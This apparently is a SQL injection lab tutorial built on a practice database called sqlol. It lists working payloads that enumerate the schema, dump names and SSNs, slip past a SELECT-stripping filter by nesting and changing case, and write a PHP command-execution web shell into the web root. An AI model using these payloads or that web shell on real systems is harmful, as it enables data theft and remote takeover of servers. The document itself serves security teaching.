Hands-On SQL Injection Tutorial #2

1. Reset the Database Before Using It

2. SQL Database Structure

The database named sqlol contains the two tables shown below.

Table: users

Field: usernameField: isadmin
Herp Derper1
SlapdeBack LovedeFace1
Wengdack Slobdegoob0
Chunk MacRunfast0
Peter Weiner0
    

Table: ssn

Field: nameField: ssn
Herp Derper111-11-1111
SlapdeBack LovedeFace222-22-2222
Wengdack Slobdegoob333-33-3333
Chunk MacRunfast444-44-4444
Peter Weiner555-55-5555

Important Terms

Database -- an object that contains Tables
Table -- an object that contains Fields
Field -- an item of data, such as a name or ssn

3. Blocking Apostrophe

This form deletes apostrophes from the name before using it in a SQL query. However, the numerical field is exploitable.

Try the inputs below in this form to see how it works.

Name:  

IsAdmin (0 or 1):  

   

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try

Find User

NameHerp Derper
Isadmin      1

Detect Filtering

NameHerp 'Derper
Isadmin      1

Detect Vulnerability

NameHerp Derper
Isadmin      2-1

Test for 1 Column Returned

NameHerp Derper
Isadmin      1 UNION SELECT Null #

Test for 2 Columns Returned

NameHerp Derper
Isadmin      1 UNION SELECT Null, Null #

Find Database Names

NameHerp Derper
Isadmin1 UNION SELECT Null,table_schema FROM information_schema.tables #

Find Tables in sqlol Database

NameHerp Derper
Isadmin1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' #

Find Columns within ssn Table

NameHerp Derper
Isadmin1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' #

Dump Names and SSNs

NameHerp Derper
Isadmin1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn #

Upload a PHP Shell

NameHerp Derper
Isadmin1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #

4. Blocking SELECT

This form uses this code to remove SELECT:
$qname =  str_replace("SELECT", "", $qname);
$qisadmin =  str_replace("SELECT", "", $qisadmin);
Try the inputs below in this form to see how it works.

Name:  

IsAdmin (0 or 1):  

   

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try

Find User

NameHerp Derper
Isadmin      1

Detect Filtering

NameHerpSELECT Derper"
Isadmin      1SELECT

Detect Vulnerability

NameHerp Derper
Isadmin      2-1

Test for 2 Columns Returned: FAILS

NameHerp Derper
Isadmin      1 UNION SELECT Null, Null #

Test for 2 Columns Returned: SUCCEEDS

NameHerp Derper
Isadmin      1 UNION SELSELECTECT Null, Null #

Test for 2 Columns Returned: SUCCEEDS

NameHerp Derper
Isadmin      1 UNION sElEcT Null, Null #


Posted 10-31-16 by Sam Bowne